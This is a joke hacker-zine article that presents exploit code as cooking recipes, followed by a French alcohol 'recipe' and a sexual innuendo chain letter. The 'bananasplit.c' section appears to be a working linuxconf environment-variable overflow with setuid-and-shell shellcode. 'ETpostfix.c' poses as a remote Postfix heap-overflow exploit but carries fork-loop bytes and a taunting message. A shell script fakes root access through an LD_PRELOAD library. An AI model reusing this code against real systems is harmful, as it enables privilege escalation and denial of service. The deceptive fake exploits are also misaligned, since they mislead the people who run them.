                      NoCooking issue 0x00, article 0x06
        __  __     _  __  _ ____      _ _        _  __     _           
        \ \/ /_ __/ |/  \/ |__  |  __| / |___ __| |/  \ __/ |_ _  __ _ 
         >  <| '_ \ | () | | / /  / _` | (_-</ _| | () (_-< | ' \/ _` |
        /_/\_\ .__/_|\__/|_|/_/   \__,_|_/__/\__|_|\__//__/_|_||_\__, |
             |_|    by k4rL0s, Sl33m f4s7 & m1xs0up              |___/ 

Wellcome on our special greetz to the Internationnal Handbook for Cooking
who featured us a l0t 0f 0dayz.

--[ BananaSplit
Here comes a very usefull code to prepare a banana split :
<bananasplit.c>
/* HowTo make a banasplit by the IHC Team
 * IHC Stands for Internationnal Handbook for Cooking - Cook Together
 *        http://0xbadc0de.be/ihc
 * Greetz goes to : Maite, Jean Pierre Coffe
 * C0d3d by m1xs0up 
 * COOKING IS NOT A CRIME
 */
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

typedef int liquid;
typedef int vegetable;
typedef int spice;
typedef char *powder;
#define BANANA "/////////////////////tmp/tmp"
#define LEMON "/tmp/tmp.eng"
#define ORANGE "/tmp/tmp.eng/tmp"
#define KIWI "/tmp/tmp.eng/tmp/tmp.eng"
#define getsoup getenv
#define mixsoup setenv
#define toast execve
#define mix strcat
#define clean bzero
#define fill memset
#define water malloc
#define squeeze mkdir
#define drink creat
#define LOT_SUGAR (S_IRWXU|S_IRWXG|S_IRWXO)
#define FREASH (O_WRONLY|O_CREAT|S_IRWXU|S_IRWXG|S_IRWXO)
powder coconuts=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x31\xc0"
"\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0"
"\x0b\xcd\x80" ;
 /*size :33 */
liquid tabasco;
spice salt;
                     
extern powder *environ;


powder prepare_bacon(){
powder soup=(powder)water((liquid)1200);

spice pepper=0;
vegetable zero=0;
liquid tomato=getsoup("BANANA")+10;
liquid zero2=0;
vegetable carrot=getsoup("COCONUTS")+30;
liquid litres=854 + tabasco;
clean(soup,1200);
fill(soup,'A',litres);
for(pepper=0;pepper<2;pepper++)
        mix(soup,&tomato);
for(pepper=0;pepper<11;pepper++)
        mix(soup,&carrot);
for(pepper=0;pepper<4;pepper++)
        mix(soup,&tomato);
for(pepper=0;pepper<1;pepper++)
        mix(soup,&carrot);
for(pepper=0;pepper<3;pepper++)
        mix(soup,&tomato);
for(pepper=0;pepper<24;pepper++)
        mix(soup,&carrot);
for(pepper=0;pepper<salt;pepper++)
        mix(soup,"A");
fprintf(stderr,"using %.8lx as BANANA tomato and %.8lx as carrot addr \n",
        tomato,carrot);
return soup;
}
 
int prepare_eggs(liquid milk,powder * concentrated_milk){
mixsoup("COCONUTS",coconuts);
mixsoup("BANANA",BANANA);
mixsoup("LINUXCONF_LANG",prepare_bacon());
toast(concentrated_milk[0],concentrated_milk,environ);
return 0;
}

int main(spice spices,powder * ingredients){
powder menu[]={"./linuxconf",NULL};
if(spices>1)
        tabasco=atoi(ingredients[1]);
if(spices>2)
        salt=atoi(ingredients[2]);
if(spices>3)
        menu[0]=ingredients[3];
if(!getsoup("LINUXCONF_LANG")){
        prepare_eggs(spices,ingredients);
        }
mixsoup("LINUXCONF_LANG",prepare_bacon());
umask(0);
squeeze(LEMON,LOT_SUGAR);
squeeze(ORANGE,LOT_SUGAR);
drink(KIWI,FREASH);
toast(menu[0],menu,environ);
 return 0;
 }
</bananasplit.c>


--[ ETpostfix

Now a real 0dayz !!! It gave remote access on nearly every postfix servers !!!
31337 !
<ETpostfix.c>
/*
 * Postfix 1.x Heap overflow
 * It was designed only against Linux x86
 * c0d3d by Sl33m f4s7
 */
#include <sys/types.h>
#include <sys/stat.h>
#include <netdb.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#define STDOUT          1
#define STDERR          2
#define GREEN(s)        "\033[32m" s "\033[0m"
#define RED(s)          "\033[31m" s "\033[0m"
#define BLUE(s)         "\033[34m" s "\033[0m"
#define HEADER          "\033[34m" "\t\t[ ETpostfix : smash postfix 1.x ]" "\033
[0m\n\n"
char LEET_JUMP[] = "\xeb\x0appssssffff";
/* bind socket shellcode for linux x86. IDS-Safe */
char shellcode[] = 
  "\x31\xC0\x40\x40\xCD\x80\xEB\xF8\x31\xC0\x31\xDB\x40\xCD\x80"
  "\x6D\x77\x61\x68\x61\x68\x61\x68\x2C\x20\x6A\x75\x73\x74\x20"
  "\x79\x6F\x75\x20\x73\x75\x63\x6B\x20\x6C\x61\x6D\x65\x72\x73"
  "\x20\x79\x6F\x75\x20\x67\x6F\x74\x20\x6F\x77\x6E\x65\x64\x20"
  "\x62\x79\x20\x61\x20\x73\x74\x75\x70\x69\x64\x20\x66\x61\x6B"
  "\x65\x20\x73\x70\x6C\x6F\x69\x74\x20\x21\x21\x21\x20\x44\x6F"
  "\x20\x79\x6F\x75\x20\x72\x65\x61\x6C\x6C\x79\x20\x74\x68\x6F"
  "\x75\x67\x68\x20\x77\x65\x20\x77\x65\x72\x65\x20\x67\x6F\x69"
  "\x6E\x67\x20\x74\x6F\x20\x67\x69\x76\x65\x20\x79\x6F\x75\x20"
  "\x70\x72\x69\x76\x38\x20\x30\x64\x61\x79\x7A\x2C\x20\x79\x6F"
  "\x75\x20\x6D\x75\x73\x74\x20\x6B\x69\x64\x64\x69\x6E\x67\x20"
  "\x21\x21\x21";
#define UEBER_DUMMY     "\xfc\xff\xff\xff\xfc\xff\xff\xff"
char* woody_ovf(char *shellcode){
char *buf;
unsigned int addr;
buf=(char*)malloc(273);
if(!buf) return NULL;
buf[272]=0;
memset(buf,'B',272);
memcpy(buf,shellcode,strlen(shellcode));
memcpy(buf+256,UEBER_DUMMY,8);
addr=0x8049720;
memcpy(buf+264,&addr,4);
addr=0x80498a8;
memcpy(buf+268,&addr,4);
return buf;
}
char* redhat8_ovf(char *shellcode){
char *buf;
unsigned int addr;
buf=(char*)malloc(273);
if(!buf) return NULL;
buf[272]=0;
memset(buf,'B',272);
memcpy(buf,shellcode,strlen(shellcode));
memcpy(buf+256,UEBER_DUMMY,8);
addr=0x8049840;
memcpy(buf+264,&addr,4);
addr=0x80498f4;
memcpy(buf+268,&addr,4);
return buf;
}
char* potato_ovf(char *shellcode){
char *buf;
unsigned int addr;
buf=(char*)malloc(145);
if(!buf) return NULL;
buf[144]=0;
memset(buf,'B',144);
memcpy(buf,shellcode,strlen(shellcode));
memcpy(buf+128,UEBER_DUMMY,8);
addr=0x8049720;
memcpy(buf+136,&addr,4);
addr=0x80497a0;
memcpy(buf+140,&addr,4);
return buf;
}
char* redhat7_ovf(char *shellcode){
char *buf;
unsigned int addr;
buf=(char*)malloc(145);
if(!buf) return NULL;
buf[144]=0;
memset(buf,'B',144);
memcpy(buf,shellcode,strlen(shellcode));
memcpy(buf+128,UEBER_DUMMY,8);
addr=0x8049810;
memcpy(buf+136,&addr,4);
addr=0x80498a4;
memcpy(buf+140,&addr,4);
return buf;
}
struct { char *target; char* (*fct)(); } targetlist[] = 
{ {"Debian Woody x86",woody_ovf},{"Debian Potato x86",potato_ovf},
  {"Redhat 8 x86",redhat8_ovf},{"Redhat 7.1 x86",redhat7_ovf}, {NULL,NULL} };
char* make_overflow(char *argv1){
char* (*fct)(char*);
char sc[sizeof(LEET_JUMP)+sizeof(shellcode)+1];
int*s=(int*)sc;
int i,j=atoi(argv1);
fct=targetlist[j].fct;
for(i=0;i<sizeof(LEET_JUMP)+sizeof(shellcode)+100;i+=4,s++)
        *s=(i<sizeof(LEET_JUMP)-1)?*(int*)&(LEET_JUMP[i]):(i<sizeof(LEET_JUMP)+sizeof(shellcode)-1)?*(int*)&(shellcode[i-sizeof(LEET_JUMP)+1]):(int)(sc);
return fct(sc);
}
void usage(char *prog){
int i;
fprintf(stderr,"[-] usage : %s target host [port]\n",prog);
fprintf(stderr,"targets are :\n");
for(i=0;targetlist[i].target;i++) fprintf(stderr,"\t%d - %s\n",i,targetlist[i].t
arget);
exit(-1);
}
int main(int argc, char **argv)
{
char *ovf; char buf[2048];
struct sockaddr_in a; int s; struct hostent *h;
fprintf(stderr,HEADER);
if(argc<3) usage(argv[0]);
a.sin_port=htons((argc>3)?atoi(argv[3]):25);
a.sin_family=AF_INET;
fprintf(stderr,"[+] resolving %s...\t\t\t",argv[2]);
h=gethostbyname(argv[2]);
if(!h){
        fprintf(stderr,RED("FAILED !\n"));
        perror("gethostbyname");
        exit(-1);
}
fprintf(stderr,GREEN("OK\n"));
a.sin_addr=*(struct in_addr*)h->h_addr;
fprintf(stderr,"\t--> addr =\t\t\t\t");
fprintf(stderr,BLUE("%s\n"),inet_ntoa(a.sin_addr));
fprintf(stderr,"[+] connecting to SMTP server on port %d...\t",ntohs(a.sin_port)
);
if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0){
        fprintf(stderr,RED("FAILED !\n"));
        perror("socket");
        exit(-1);
}
if(connect(s,(struct sockaddr*)(&a),sizeof(struct sockaddr_in))<0){
        fprintf(stderr,RED("FAILED !\n"));
        perror("connect");
        exit(-1);
}
fprintf(stderr,GREEN("OK\n"));
fprintf(stderr,"[+] dialoging with ESMTP server\n");
fprintf(stderr,"\t--> writing HELO msg\t\t\t");
write(s,"HELO localhost\r\n",16);
fprintf(stderr,GREEN("OK\n"));
fprintf(stderr,"\t--> preparing overflow\t\t\t");
ovf=make_overflow(argv[1]);
if(!ovf){
        fprintf(stderr,RED("FAILED !\n"));
        exit(-1);
}
sprintf(buf,"HELP %s\r\n",ovf);
fprintf(stderr,GREEN("OK\n"));
fprintf(stderr,"\t--> sending overflow\t\t\t");
write(s,buf,strlen(buf));
fprintf(stderr,GREEN("OK\n"));
close(s);
fprintf(stderr,BLUE("\n\nNow you should just connect on port 8481 and enjoy :p\n
"));
return 0;
}
</ETpostfix.c>


---[ ihc-lnx-blaster

Yeah, this new sploit give euid=0 on every lnx box !!! just another 0dayz...
Thx to m1xs0up

<ihc-lnx-blaster.sh>
#!/bin/sh
# cet exploit attaque une vulnerabilit des variables d'environnement
# sous linux
# a utiliser avec precaution
# ne pas distribuer !!
# by m1xs0up
# usage :
# ihc@darkside$ ./exploit.sh
# x - creating lock directory
# x - extracting root.c (text)
# ok programme installe
# compilation ...fabrication de la chaine d'exploit ... ok
# lancement de l'exploit... okenjoy your shell !
# sh-2.05b# id
# uid=0(root) gid=0(root) egid=1000(ihc) groups=1000(ihc)
# sh-2.05b#


save_IFS="${IFS}"
IFS="${IFS}:"
gettext_dir=FAILED
locale_dir=FAILED
first_param="$1"
for dir in $PATH
do
  if test "$gettext_dir" = FAILED && test -f $dir/gettext \
     && ($dir/gettext --version >/dev/null 2>&1)
  then
    set `$dir/gettext --version 2>&1`
    if test "$3" = GNU
    then
      gettext_dir=$dir
    fi
  fi
  if test "$locale_dir" = FAILED && test -f $dir/shar \
     && ($dir/shar --print-text-domain-dir >/dev/null 2>&1)
  then
    locale_dir=`$dir/shar --print-text-domain-dir`
  fi
done
IFS="$save_IFS"
if test "$locale_dir" = FAILED || test "$gettext_dir" = FAILED
then
  echo=echo
else
  TEXTDOMAINDIR=$locale_dir
  export TEXTDOMAINDIR
  TEXTDOMAIN=sharutils
  export TEXTDOMAIN
  echo="$gettext_dir/gettext -s"
fi
if touch -am -t 200112312359.59 $$.touch >/dev/null 2>&1 && test ! -f 200112312359.59 -a -f $$.touch; then
  shar_touch='touch -am -t $1$2$3$4$5$6.$7 "$8"'
elif touch -am 123123592001.59 $$.touch >/dev/null 2>&1 && test ! -f 123123592001.59 -a ! -f 123123592001.5 -a -f $$.touch; then
  shar_touch='touch -am $3$4$5$6$1$2.$7 "$8"'
elif touch -am 1231235901 $$.touch >/dev/null 2>&1 && test ! -f 1231235901 -a -f $$.touch; then
  shar_touch='touch -am $3$4$5$6$2 "$8"'
else
  shar_touch=:
  echo
  $echo 'WARNING: not restoring timestamps.  Consider getting and'
  $echo "installing GNU \`touch', distributed in GNU File Utilities..."
  echo
fi
rm -f 200112312359.59 123123592001.59 123123592001.5 1231235901 $$.touch
#
if mkdir _sh24061; then
  $echo 'x -' 'creating lock directory'
else
  $echo 'failed to create lock directory'
  exit 1
fi
# ============= root.c ==============
if test -f 'root.c' && test "$first_param" != -c; then
  $echo 'x -' SKIPPING 'root.c' '(file already exists)'
else
  $echo 'x -' extracting 'root.c' '(text)'
  sed 's/^X//' << 'SHAR_EOF' > 'root.c' &&
int getuid(){
X return 0;
}
int geteuid(){
X return 0;
}
int setuid(int n){
X return 0;
}
int seteuid(){
X return 0;
}
int getgid(){
X return 0;
}
SHAR_EOF
  (set 20 04 04 08 17 35 27 'root.c'; eval "$shar_touch") &&
  chmod 0644 'root.c' ||
  $echo 'restore of' 'root.c' 'failed'
  if ( md5sum --help 2>&1 | grep 'sage: md5sum \[' ) >/dev/null 2>&1 \
  && ( md5sum --version 2>&1 | grep -v 'textutils 1.12' ) >/dev/null; then
    md5sum -c << SHAR_EOF >/dev/null 2>&1 \
    || $echo 'root.c:' 'MD5 check failed'
b991d4c688f60a44e077b3dd77fb1109  root.c
SHAR_EOF
  else
    shar_count="`LC_ALL= LC_CTYPE= LANG= wc -c < 'root.c'`"
    test 142 -eq "$shar_count" ||
    $echo 'root.c:' 'original size' '142,' 'current size' "$shar_count!"
  fi
fi
rm -fr _sh24061

echo "ok programme installe"
echo -n "compilation ..."
gcc -o root.so -shared root.c || (echo "foirage" ; exit 0)
echo -n "fabrication de la chaine d'exploit ... "
export LD_PRELOAD=./root.so
echo "ok"
echo -n "lancement de l'exploit... "
sleep 1
echo -n "ok"
echo "enjoy your shell !"
/bin/sh 
rm -f root.c root.so
</ihc-lnx-blaster.sh>

---[ 1337 2oo% alc0h0l c0ckT4iL
The last but not the least, a real cool 0dayz from k4rL0s.

<alcohol.c>
1337 2oo% alc0h0l c0ckT4iL

Y0! alor today on va parl 1 peu de mtage de tronche parcke pour tre un bon
h4ck3r (je m d numrau pour pass l filtrage 2 la DST ke certain apele NSA
ou mme SNCF) il fo savoir boir po mal pour rest toute l nuis devan le laptop
a rout d serveur.


La recte d'ojourdui c le 1337 2oo% alc0h0l c0ckT4iL, ca f super mal o ventre
la premire foi m apr on s'y abitu.

Alor dabor l ingrdien:
0x00000001 biberon de bb (hijack celui a votr petit soeur)
0x00001337 cl 2 vodka
0x0BADC0DE g 2 rhum
0xDEADBEEF m.s-1 2 coK
0x1337C0DE F 2 jin
0x69696969 N 2 wisky
 
l 0x sa ve dire ke c en hexadecimal, c avec 2 la base 16, avec d lettre
ke en fait c d chifres

Pour 7 recte on va commenc par mettre du coca dans le biberon, et apr le
wisky, comme ca on a du wisky Coca. La fo melang, et pui fair chof au micro
onde pdt 1337 seconde,  apr vou le sort  vou mlang bien for.
Now on va add le jin  le rhum en mme temps, pour ke sa done un myeur gou.
Oubli po 2 bien mlang a mesure ke vous vers pour ke sa se mlanje mieu.
Kan vou av termin, mt o conglateur jusK se ke sa devienne 1 glasson.
Vou fte chof la vokda o four termosta 5 pdt 3 minutes (demand a votre
maman si vou sav po fer march le four) et fte tremp le glasson dedans
jusK se ki fonde.

Vers tou dan le biberon,  vous pouv consom (avec la ttine c mieu)

C ass for m avec sa g hack mon colge ct tro easy.

O proch1 numro je vou expliker coment on f l piza o couscous  a la mente

J'espre ke vous av m ma re7,  ke ca vou a apri d choze. Dzol pr l
fotes d'ortografe m g po le tps 2 corrig g 1 lameur ki ve me hack, fo ke je
me vanje.

k4rL0s, le cuisign ruz
</alcohol.c>


---[ Last Minute

Oui, on a pecho un 0dayz de m41t3 donc le voila :

<love_cake.c>
Gteau d'Amour
Ingrdients :
-Un lit chaud
-2 corps diffrents (pralablement lav)
-500 grammes de caresses (ou plus)
-50 grammes de baisers (ou plus)
-1 bananes pas trop mure
-2 kiwis
-2 pamplemousses (grosseur  volont)
-1 four prchauff  feux doux
Prparation :
-Introduire les 2 corps dans un lit chaud avec 50 grammes ou plus de
 baisers
-Enduire la surface des corps avec 500 grammes ou plus de caresses
 (en ajouter si pas assez sucr)
-Couvrir ces memes corps, en particulier la bananes jusqu' saturation
 (attention; ne pas faire de blanc en neige) avec la banane!
-Agitez, avec mnagement, les 2 pamplemousses, les faire dorer trs
 lgrement sans les faire rougir
-Mettre la banane, pralablement chauff, du bout des doigts dans le
 four  temprature ambiante. Essentiel : laisser les 2 kiwis non peles
  l'extrieur
-Manoeuvrer la banane trs dlicatement en va et vient. La sortir de
 temps  autre et la retourner, afin de contrler la cuisson : ceci afin
 qu'elle ne perdent pas son jus.
-Extraire le jus de la banane, qui lui, doit rester dans le four.
 Retirer celle-ci avec lgret.
-Pour achever le gteau, laissez macrer dans les mains ou essuyer le
 surplus avec la langue, ceci tant laisser le choix  la cuisinire.
-Laissez refroidir.
-Dmouler 9 mois aprs.
Ne pas omettre de recommencer frquemment la recette afin d'en savourer
chaque fois davantage le gout.
Transfrer cette dlicieuse recette  aux moins 7 de vos contacts sinon
jamais vous ne reusirez  faire ce GTEAU D'AMOUR.
</love_cake.c>
